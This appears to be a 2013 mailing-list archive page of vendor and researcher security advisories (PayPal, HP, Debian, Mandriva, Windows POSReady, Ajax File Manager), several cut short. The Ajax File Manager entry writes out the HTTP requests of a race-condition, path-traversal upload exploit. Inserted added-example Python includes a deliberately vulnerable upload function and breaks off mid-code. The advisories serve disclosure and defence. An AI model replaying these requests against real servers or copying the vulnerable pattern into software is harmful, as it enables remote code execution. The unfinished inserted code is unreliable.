Paypal Inc Bug Bounty #99 - Filter Bypass & Persistent Web Vulnerability

2013-09-19 Thread Vulnerability Lab
Title:
==
Paypal Inc Bug Bounty #99 - Filter Bypass & Persistent Web Vulnerability


Date:
=
2013-09-20


References:
===
http://www.vulnerability-lab.com/get_content.php?id=984

PayPal Security UID: nj1071UU


VL-ID:
=
984


Common Vulnerability Scoring System:

3.9


Introduction:
=
PayPal is a global e-commerce business allowing payments and money transfers to 
be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper 
methods, such as checks and money orders. Originally, 
a PayPal account could be funded with an electronic debit from a bank account 
or by a credit card at the payer's choice. But some 
time in 2010 or early 2011, PayPal began to require a verified bank account 
after the account holder exceeded a predetermined 
spending limit. After that point, PayPal will attempt to take funds for a 
purchase from funding sources according to a specified 
funding hierarchy. If you set one of the funding sources as Primary, it will 
default to that, within that level of the hierarchy 
(for example, if your credit card ending in 4567 is set as the Primary over 
1234, it will still attempt to pay money out of your 
PayPal balance, before it attempts to charge your credit card). The funding 
hierarchy is a balance in the PayPal account; a 
PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master 
Card or Bill Me Later (if selected as primary 
funding source) (It can bypass the Balance); a verified bank account; other 
funding sources, such as non-PayPal credit cards.
The recipient of a PayPal transfer can either request a check from PayPal, 
establish their own PayPal deposit account or request 
a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, 
auction sites, and other commercial users, for which it 
charges a fee. It may also charge a fee for receiving money, proportional to 
the amount received. The fees depend on the currency 
used, the payment option used, the country of the sender, the country of the 
recipient, the amount sent and the recipient's account 
type. In addition, eBay purchases made by credit card through PayPal may incur 
extra fees if the buyer and seller use different currencies.

On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its 
corporate headquarters are in San Jose, California, United 
States at eBay's North First Street satellite office campus. The company also 
has significant operations in Omaha, Nebraska, Scottsdale, 
Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow 
(near Berlin) and Tel Aviv. As of July 2007, across 
Europe, PayPal also operates as a Luxembourg-based bank.

On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), 
China's bankcard association, to allow Chinese consumers to use PayPal to shop 
online. PayPal is planning to expand its workforce in Asia to 2,000 by the end 
of the year 2010.
Between December 4–9, 2010, PayPal services were attacked in a series of 
denial-of-service attacks organized by Anonymous in retaliation for PayPal's 
decision to freeze the account of WikiLeaks citing terms of use violations over 
the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal]


Abstract:
=
The Vulnerability Laboratory Research Team discovered a filter bypass & 
persistent web vulnerability in the official PayPal Inc Core Application API.


Report-Timeline:

2013-06-24: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2013-06-25: Vendor Notification (PayPal Inc Site Security Team)
2013-09-10: Vendor Response/Feedback (PayPal Inc Site Security Team)
2013-09-19: Vendor Fix/Patch (Developer Team - Bug Bounty Program Reward)
2013-09-20: Public Disclosure (Vulnerability Laboratory)


Status:

Published


Affected Products:
==
PayPal Inc
Product: Core - Common [API] 2013 Q2


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

An input filter bypass & persistent script code injection vulnerability is 
detected in the official PayPal Inc Core Application API.
A filter bypass vulnerability allows remote attackers to evade the basic filter 
validation of a vulnerable application API module.
A persistent script code injection web vulnerability allows remote attackers to 
inject script code on the application-side of the affected module.

There is a feature in PayPal that allows its users to set up a custom message for 
their online customers. PayPal users can customize this message so their online 
customers automatically get relevant information if they file a dispute in the 
Resolution Center. People who will get this message are usually the ones that 
either bought an item from a user online but said it didn

[security bulletin] HPSBGN02925 rev.1 - HP IceWall SSO, IceWall File Manager and IceWall Federation Agent, Multiple Remote Unauthorized Access Vulnerabilities

2013-09-19 Thread security-alert

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03918632

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03918632
Version: 1

HPSBGN02925 rev.1 - HP IceWall SSO, IceWall File Manager and IceWall
Federation Agent, Multiple Remote Unauthorized Access Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-09-19
Last Updated: 2013-09-19

Potential Security Impact: Remote unauthorized access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP IceWall SSO,
IceWall File Manager and IceWall Federation Agent. The vulnerabilities could
be exploited remotely resulting in unauthorized access.

References: CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820,
SSRT101310

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP IceWall SSO Version 8.0
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 Enterprise Edition R1
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0.1 Standard Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 R2 Enterprise Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 R2 Standard Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 R3 Enterprise Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 R3 Standard Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 10.0 Enterprise Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 10.0 Standard Edition
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 10.0 Enterprise Edition for Windows
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 10.0 Standard Edition for Windows
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO Version 8.0 Agent Option
 CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820

HP IceWall SSO Version 8.0 Agent Option 2007
 CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820

HP IceWall SSO Version 10.0 Agent Option
 CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820

HP IceWall SSO Version 10.0 Agent Option Update Release 1
 CVE-2013-4817, CVE-2013-4818, CVE-2013-4819, CVE-2013-4820

HP IceWall File Manager Version 3.0
 CVE-2013-4818, CVE-2013-4820

HP IceWall File Manager Version 3.0 SP1
 CVE-2013-4818, CVE-2013-4820

HP IceWall File Manager Version 3.0 SP2
 CVE-2013-4818, CVE-2013-4820

HP IceWall File Manager Version 3.0 SP3
 CVE-2013-4818, CVE-2013-4820

HP IceWall File Manager Version 3.0 SP4
 CVE-2013-4818, CVE-2013-4820

HP IceWall SSO 8.0 SAML2 Agent Option
 CVE-2013-4820

HP IceWall Federation Agent 3.0
 CVE-2013-4820

HP IceWall SSO 8.0 JAVA Agent Library
 CVE-2013-4820

HP IceWall SSO 8.0 JAVA Agent Library 2007
 CVE-2013-4820

HP IceWall SSO 10.0 JAVA Agent Library
 CVE-2013-4820

HP IceWall SSO 10.0 Smart Device Option
 CVE-2013-4818, CVE-2013-4820

BACKGROUND

CVSS 2.0 Base Metrics
====================================================================
  Reference        Base Vector                          Base Score
  CVE-2013-4817    (AV:N/AC:L/Au:N/C:P/I:N/A:N)         5.0
  CVE-2013-4818    (AV:N/AC:M/Au:N/C:P/I:N/A:N)         4.3
  CVE-2013-4819    (AV:N/AC:M/Au:S/C:P/I:N/A:N)         3.5
  CVE-2013-4820    (AV:N/AC:H/Au:S/C:P/I:N/A:N)         2.1
====================================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has made the following software updates available to resolve the
vulnerabilities:

IceWall SSO 10.0 DFW for Windows Patch Release 1

IceWall SSO 8.0 R2 CERTD Patch Release 7

IceWall SSO 8.0 R3 CERTD Patch Release 4

IceWall SSO 10.0 CERTD Patch Release 5

IceWall SSO 10.0 CERTD for Windows Patch Release 1

IceWall SSO 10.0 Agent Option Patch Release 2 Servlet edition

IceWall SSO 8.0 Agent Option 2007 Update Release 2 Patch Release 5

IceWall SSO 10.0 Agent Option Patch Release 1 IIS edition

HP has provided a mitigation workaround for the vulnerabilities for the
following products:

HP IceWall SSO Version 8.0

HP IceWall SSO Version 8.0 Enterprise Edition R1

HP IceWall SSO Version 8.0.1 Standard Edition

HP IceWall SSO Version 8.0 R2 Enterprise Edition

HP IceWall SSO Version 8.0 R2 Standard Edition

HP IceWall SSO Version 8.0 R3 Enterprise Edition

HP IceWall SSO Version 8.0 R3 Standard Edition

HP IceWall SSO Version 10.0 Enterprise Edition

HP IceWall SSO Version 10.0 Standard Edition

HP IceWall SSO Version 8.0 Agent Option

HP IceWall SSO Version 8.0 Agent Option 2007

HP IceWall SSO Version 10.0 Agent Option

HP IceWall SSO Version 10.0 Agent Option Update Release 1

HP IceWall File Manager Version 3.0

HP IceWall File Manager Version 3.0 SP1

HP IceWall File Manager Version 3.0 SP2

HP IceWall File Manager Version 3.0 SP3

HP IceWall File Manager Version 3.0

[SECURITY] [DSA 2761-1] puppet security update

2013-09-19 Thread Raphael Geissert

-------------------------------------------------------------------------
Debian Security Advisory DSA-2761-1                   secur...@debian.org
http://www.debian.org/security/                           Raphael Geissert
September 19, 2013                      http://www.debian.org/security/faq
-------------------------------------------------------------------------

Package: puppet
Vulnerability  : several
Problem type   : local
Debian-specific: no
CVE ID : CVE-2013-4761 CVE-2013-4956

Several vulnerabilities were discovered in puppet, a centralized
configuration management system. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2013-4761

The 'resource_type' service (disabled by default) could be used to
make puppet load arbitrary Ruby code from puppet master's file
system.

CVE-2013-4956

Modules installed with the Puppet Module Tool might be installed
with weak permissions, possibly allowing local users to read or
modify them.

The stable distribution (wheezy) has been updated to version 2.7.33 of
puppet. This version includes the patches for all the previous DSAs
related to puppet in wheezy. In this version, the puppet report format
is now correctly reported as version 3.

It is to be expected that future DSAs for puppet update to a newer,
bug fix-only, release of the 2.7 branch.

The oldstable distribution (squeeze) has not been updated for this
advisory: as of this time there is no fix for CVE-2013-4761 and the
package is not affected by CVE-2013-4956.

For the stable distribution (wheezy), these problems have been fixed in
version 2.7.23-1~deb7u1.

For the testing distribution (jessie) and the unstable distribution (sid),
these problems have been fixed in version 3.2.4-1.

We recommend that you upgrade your puppet packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[security bulletin] HPSBGN02923 rev.1 - HP ArcSight Enterprise Security Manager Management Web Interface, Remote Cross Site Scripting (XSS)

2013-09-19 Thread security-alert

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03901176

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03901176
Version: 1

HPSBGN02923 rev.1 - HP ArcSight Enterprise Security Manager Management Web
Interface, Remote Cross Site Scripting (XSS)

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2013-09-19
Last Updated: 2013-09-19

Potential Security Impact: Remote Cross Site Scripting (XSS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP ArcSight
Enterprise Security Manager Management Web Interface. The vulnerability could
be exploited remotely resulting in Cross Site Scripting (XSS).

References: CVE-2013-4815 (SSRT101101)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP ArcSight Enterprise Security Manager (ESM) prior to v5.5.

BACKGROUND

CVSS 2.0 Base Metrics
====================================================================
  Reference        Base Vector                          Base Score
  CVE-2013-4815    (AV:N/AC:M/Au:N/C:N/I:P/A:N)         4.3
====================================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Puneeth Gowda for reporting this issue to
security-al...@hp.com

RESOLUTION

HP has made the following software update available to resolve the
vulnerability.

HP ArcSight Enterprise Security Manager (ESM) v5.5 or subsequent.

HISTORY
Version:1 (rev.1) - 19 September 2013 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.



[ MDVSA-2013:239 ] wordpress

2013-09-19 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2013:239
 http://www.mandriva.com/en/support/security/
 ___

 Package : wordpress
 Date: September 19, 2013
 Affected: Business Server 1.0
 ___

 Problem Description:

 Updated wordpress and php-phpmailer packages fix security
 vulnerabilities:
 
 wp-includes/functions.php in WordPress before 3.6.1 does not properly
 determine whether data has been serialized, which allows remote
 attackers to execute arbitrary code by triggering erroneous PHP
 unserialize operations (CVE-2013-4338).
 
 WordPress before 3.6.1 does not properly validate URLs before use in
 an HTTP redirect, which allows remote attackers to bypass intended
 redirection restrictions via a crafted string (CVE-2013-4339).
 
 wp-admin/includes/post.php in WordPress before 3.6.1 allows remote
 authenticated users to spoof the authorship of a post by leveraging the
 Author role and providing a modified user_ID parameter (CVE-2013-4340).
 
 The get_allowed_mime_types function in wp-includes/functions.php in
 WordPress before 3.6.1 does not require the unfiltered_html capability
 for uploads of .htm and .html files, which might make it easier for
 remote authenticated users to conduct cross-site scripting (XSS)
 attacks via a crafted file (CVE-2013-5738).
 
 The default configuration of WordPress before 3.6.1 does not prevent
 uploads of .swf and .exe files, which might make it easier for remote
 authenticated users to conduct cross-site scripting (XSS) attacks
 via a crafted file, related to the get_allowed_mime_types function
 in wp-includes/functions.php (CVE-2013-5739).
 
 Additionally, php-phpmailer has been updated to a newer version
 required by the updated wordpress.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4338
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4339
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4340
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5738
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5739
 http://advisories.mageia.org/MGASA-2013-0285.html
 ___

 Updated Packages:

 Mandriva Business Server 1/X86_64:
 20b778e4dce88394ba3fe60f3db38ec6  mbs1/x86_64/php-phpmailer-5.2.7-0.20130917.1.mbs1.noarch.rpm
 9174445e9a2e76973bcbea3909ba8af7  mbs1/x86_64/wordpress-3.6.1-1.mbs1.noarch.rpm
 afb38d03fc53350c03eba38eaea6561b  mbs1/SRPMS/php-phpmailer-5.2.7-0.20130917.1.mbs1.src.rpm
 ca3d0d9e13aacf26feab9382d20a0560  mbs1/SRPMS/wordpress-3.6.1-1.mbs1.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/en/support/security/advisories/

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  



Re: %windir%\temp\sso\ssoexec.dll (or: howtrustworthy is Microsoft's build process)

2013-09-19 Thread Stefan Kanthak
This is a followup to 
and :

On Sunday, March 04, 2012 9:06 PM I wrote:

> Hi @ll,
> 
> the system image "\Setup\WIM\setup.wim" on the "POSReady 2009 eval CD",
> available from the Microsoft Download Center under
> ,
> contains the following registry entries:
> 
> [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SSOExec]
> "Asynchronous"=dword:0001
> "Impersonate"=dword:0001
> "Logoff"="SSOReset"
> "Unlock"="SSOExec"
> "Lock"="SSOReset"
> "DLLName"="%windir%\\temp\\sso\\ssoexec.dll"

[...]

> To complete the picture: the ACLs on the directory "%windir%\temp" in
> systems installed from this image/CD allow unprivileged users to create
> a subdirectory "sso" in "%windir%\temp" and then the "ssoexec.dll",
> allowing them to have their code run under every (other) user account
> used to log on afterwards, resulting in a privilege escalation.

After I learned that the same vulnerability exists in EVERY installation
of Windows Embedded POSReady 2009 I contacted a vendor and Microsoft
again.

The vendor got the following reply from Microsoft:

| The Microsoft Windows Embedded Product team, along with the MSRC
| (Microsoft Security Response Center) team researched this in early
| 2012 and determined that this is a not a vulnerability because
| Microsoft Malware Protection Center does not consider this to be
| malware.

OUCH! How absurd!

| It was determined that these keys came from XP Embedded and 
| the Standard Windows Logon Component. They found no evidence of 
| malware on our build systems and the presence of the keys is not
| an indication that malware was ever present on the systems

There is no file "ssoexec.dll" in Windows Embedded POSReady 2009!
As far as I know there is no file by this name in ANY version/variant
of Windows!

I requested clarification about these absurd statements and whether
a hotfix will be provided from the MSRC  and
got the following answer:

| Could you explain how the EOP attack works using this DLL?
| Normal users don't have write permission to %windir%, and if an
| attacker controls an Administrator account then they've already
| defeated security.

to which I replied:

| The directory in question is but "%windir%\temp\"!
| In Windows Embedded POSReady 2009 UNPRIVILEGED users can create
| the subdirectory "sso\" and the DLL "ssoexec.dll".
| Game over!

which yielded another absurd answer from the MSRC:

| After some research, it appears this EOP attack requires that the
| attacker has already violated one of the 10 Immutable Laws of Security
| (http://technet.microsoft.com/library/cc722487.aspx ), most notably
| laws #1 or #3. You should read the article to understand why those
| laws matter.

OUCH! I asked the MSRC again:

| which part of "In Windows Embedded POSReady 2009 UNPRIVILEGED users
| can create the subdirectory "sso\" and the DLL "ssoexec.dll" is not
| understood?

and got the final answer:

| We are aware of the issues and arguments you've mentioned. An attacker
| in a position to carry out these attacks could also carry out many
| other attacks we can't stop. The link provided below explains this in
| detail.

OUCH!

Stefan Kanthak
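Added example (not part of Stefan Kanthak's post): a Python audit that reads a .reg export of the Winlogon\Notify key and flags notification packages whose DLLName resolves into a user-writable directory such as %windir%\temp, the condition the post describes. The sample export reproduces the SSOExec entry quoted above; the second entry (ExampleOK), the writable-directory list and all function names are assumptions.

```python
import re
import ntpath  # Windows path semantics regardless of the host running the audit

# The Winlogon notification-package key named in the post.
NOTIFY_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
              r"\CurrentVersion\Winlogon\Notify")

# Directories an unprivileged user can write to. The post reports %windir%\temp
# for POSReady 2009; extend this from your own ACL audit (assumed example list).
USER_WRITABLE_DIRS = (r"%windir%\temp",)

# Constructed .reg export: the SSOExec entry quoted in the post (dwords padded
# as regedit writes them) plus one benign entry, ExampleOK, for comparison.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\SSOExec]
"Asynchronous"=dword:00000001
"Impersonate"=dword:00000001
"Logoff"="SSOReset"
"Unlock"="SSOExec"
"Lock"="SSOReset"
"DLLName"="%windir%\\temp\\sso\\ssoexec.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ExampleOK]
"Logon"="ExampleLogon"
"DLLName"="%SystemRoot%\\system32\\example_ok.dll"
'''

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text):
    """Parse the .reg subset used above ([key] headers, "name"="string" and
    "name"=dword:... values) into {key: {name: value}}. String values have
    their .reg escaping undone (doubled backslashes, escaped quotes); other
    value types are kept as the raw text after '='."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = keys.setdefault(m.group(1), {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, value = m.groups()
            if len(value) >= 2 and value[0] == value[-1] == '"':
                value = value[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            current[name] = value
    return keys


def expand(path, windir):
    """Expand %windir% / %SystemRoot% case-insensitively; the callable
    replacement keeps the backslashes in windir literal."""
    return re.sub(r"%(windir|systemroot)%", lambda _m: windir, path, flags=re.IGNORECASE)


def in_writable_dir(dll_path, windir=r"C:\Windows"):
    """True when dll_path resolves beneath one of USER_WRITABLE_DIRS."""
    target = ntpath.normcase(expand(dll_path, windir))
    return any(target.startswith(ntpath.normcase(expand(d, windir)) + "\\")
               for d in USER_WRITABLE_DIRS)


def audit_notify(keys, windir=r"C:\Windows"):
    """Return (package, dll, events) for each Notify package whose DLL lives in
    a user-writable directory. `events` lists the Winlogon notifications
    (Logon, Unlock, ...) registered for the package, i.e. the moments at which
    Winlogon would load a DLL planted at that path."""
    findings = []
    prefix = NOTIFY_KEY.lower() + "\\"
    for key, values in keys.items():
        if not key.lower().startswith(prefix):
            continue
        dll = values.get("DLLName")
        if dll and in_writable_dir(dll, windir):
            events = sorted(n for n, v in values.items()
                            if n != "DLLName" and not v.startswith("dword:"))
            findings.append((key[len(prefix):], dll, events))
    return findings
```

On a live system the same check applies to the output of `reg export` for that key; a finding is a DLL path a standard user can pre-create, not proof that the file exists.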


[ MDVSA-2013:238 ] wireshark

2013-09-19 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2013:238
 http://www.mandriva.com/en/support/security/
 ___

 Package : wireshark
 Date: September 19, 2013
 Affected: Business Server 1.0, Enterprise Server 5.0
 ___

 Problem Description:

 Multiple vulnerabilities was found and corrected in Wireshark:
 
 The dissect_nbap_T_dCH_ID function in epan/dissectors/packet-nbap.c
 in the NBAP dissector in Wireshark 1.8.x before 1.8.10 and 1.10.x
 before 1.10.2 does not restrict the dch_id value, which allows
 remote attackers to cause a denial of service (application crash)
 via a crafted packet (CVE-2013-5718).
 
 epan/dissectors/packet-assa_r3.c in the ASSA R3 dissector in Wireshark
 1.8.x before 1.8.10 and 1.10.x before 1.10.2 allows remote attackers
 to cause a denial of service (infinite loop) via a crafted packet
 (CVE-2013-5719).
 
 Buffer overflow in the RTPS dissector in Wireshark 1.8.x before 1.8.10
 and 1.10.x before 1.10.2 allows remote attackers to cause a denial
 of service (application crash) via a crafted packet (CVE-2013-5720).
 
 The dissect_mq_rr function in epan/dissectors/packet-mq.c in the MQ
 dissector in Wireshark 1.8.x before 1.8.10 and 1.10.x before 1.10.2
 does not properly determine when to enter a certain loop, which allows
 remote attackers to cause a denial of service (application crash)
 via a crafted packet (CVE-2013-5721).
 
 Unspecified vulnerability in the LDAP dissector in Wireshark 1.8.x
 before 1.8.10 and 1.10.x before 1.10.2 allows remote attackers to
 cause a denial of service (application crash) via a crafted packet
 (CVE-2013-5722).
 
 This advisory provides the latest supported version of Wireshark
 (1.8.10) which is not vulnerable to these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5718
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5719
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5720
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5721
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5722
 https://www.wireshark.org/security/wnpa-sec-2013-55.html
 https://www.wireshark.org/security/wnpa-sec-2013-56.html
 https://www.wireshark.org/security/wnpa-sec-2013-57.html
 https://www.wireshark.org/security/wnpa-sec-2013-58.html
 https://www.wireshark.org/security/wnpa-sec-2013-59.html
 ___

 Updated Packages:

 

[PT-2013-41] Arbitrary Code Execution in Ajax File and Image Manager

2013-09-19 Thread noreply
---
(PT-2013-41) Positive Technologies Security Advisory 

Arbitrary Code Execution in Ajax File and Image Manager
---

---[ Vulnerable software ]

Ajax File and Image Manager
Version: 1.1 and earlier

Link:
http://www.phpletter.com/DOWNLOAD/

---[ Severity level ]

Severity level: High
Impact: Arbitrary Code Execution
Access Vector:  Remote


CVSS v2: 
Base Score: 10
Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)

CVE: not assigned

---[ Software description ]

Ajax file and Image Manager is an open source file manager, which employs Ajax 
and PHP. It can be used as a standalone web application, as well as the 
TinyMCE/FCKeditor plugin.

---[ Vulnerability description ]

The specialists of the Positive Research Center have detected an "Arbitrary Code 
Execution" vulnerability in Ajax File and Image Manager.

Due to incorrect application architecture, the file extension is validated only 
after the file has been uploaded. The uploaded file is subsequently removed if 
its extension is not allowed by the whitelist. Thus, the uploaded file can be 
referenced before its removal, resulting in arbitrary code execution.

Vulnerability exploitation example:

Send the following requests simultaneously:

1)

POST /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/ HTTP/1.1
Host: localhost
User-Agent: google/agent
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---307211690811
Content-Length: 613

-307211690811
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg


-307211690811--



2)


POST /targethost/admin/includes/javascript/tiny_mce/plugins/ajaxfilemanager/ajax_file_upload.php?folder=../../../../../../images/banner/ HTTP/1.1
Host: localhost
User-Agent: google/agent
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---307211690811
Content-Length: 240

-307211690811
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/jpeg

  Allow from all

-307211690811--



3)


GET /targethost/images/banner/1.php HTTP/1.1
Host: localhost
Connection: keep-alive

This will also create the following files in the /targethost/images/banner 
directory: .htaccess with

  Allow from all

and 2.php with .

---[ How to fix ]

No solution

---[ Advisory status ]

20.06.2013 - Vendor gets vulnerability details
04.09.2013 - Vulnerability details were sent to CERT
17.09.2013 - Public disclosure

---[ Credits ]

The vulnerability was detected by Ilya Krupenko, Positive Research Center 
(Positive Technologies Company)
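Added example (not code from Ajax File and Image Manager or from the Positive Technologies advisory): the store-then-validate order the advisory describes, next to a validate-before-store upload handler in Python, exercised with the advisory's own file names (1.php, .htaccess and the traversing folder parameter). The extension whitelist, the directory layout and all function names are assumptions.

```python
import os
import tempfile

# Extensions that may be stored under the web root (constructed whitelist).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "gif", "png"}


def is_allowed_name(filename):
    """Accept only a bare file name with a whitelisted extension: no path
    separators, no dotfiles such as .htaccess, no extension-less names."""
    if not filename or "/" in filename or "\\" in filename:
        return False
    if filename.startswith(".") or "." not in filename:
        return False
    return filename.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def resolve_upload_dir(upload_root, folder):
    """Resolve the caller-supplied folder and refuse anything that leaves
    upload_root, such as the advisory's folder=../../../../../../images/banner/."""
    root = os.path.realpath(upload_root)
    target = os.path.realpath(os.path.join(root, folder))
    if target != root and not target.startswith(root + os.sep):
        raise ValueError("folder escapes the upload root: %r" % folder)
    return target


def vulnerable_save(webroot, folder, filename, data, observer=None):
    """The order the advisory describes: store under the web root first, check
    the extension afterwards, delete on failure. `observer` stands in for the
    concurrent GET request and runs while the file is already on disk."""
    dest = os.path.join(webroot, folder, filename)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(data)
    if observer is not None:
        observer(dest)
    if not is_allowed_name(filename):
        os.remove(dest)  # too late: the file was already reachable
        return None
    return dest


def hardened_save(upload_root, staging_dir, folder, filename, data):
    """Validate before anything reaches the web root, write to a staging
    directory the server does not serve, then rename into place. staging_dir
    must be outside upload_root and on the same filesystem (atomic rename).
    Returns the stored path, or None when refused (nothing is written then)."""
    if not is_allowed_name(filename):
        return None
    try:
        dest_dir = resolve_upload_dir(upload_root, folder)
    except ValueError:
        return None
    fd, staged = tempfile.mkstemp(dir=staging_dir)
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(data)
        os.makedirs(dest_dir, exist_ok=True)
        dest = os.path.join(dest_dir, filename)
        os.replace(staged, dest)  # visible in the web root only once known-good
    except OSError:
        if os.path.exists(staged):
            os.remove(staged)
        raise
    return dest


def demo():
    """Run both handlers against the advisory's file names in a scratch tree
    and report which defensive properties held."""
    base = tempfile.mkdtemp()
    webroot = os.path.join(base, "www")
    upload_root = os.path.join(webroot, "images")
    staging = os.path.join(base, "staging")
    os.makedirs(upload_root)
    os.makedirs(staging)
    payload = b"constructed placeholder, not real PHP"
    served = []
    vulnerable_save(webroot, "images/banner", "1.php", payload,
                    observer=lambda path: served.append(os.path.exists(path)))
    save = lambda folder, name: hardened_save(upload_root, staging, folder, name, payload)
    results = {
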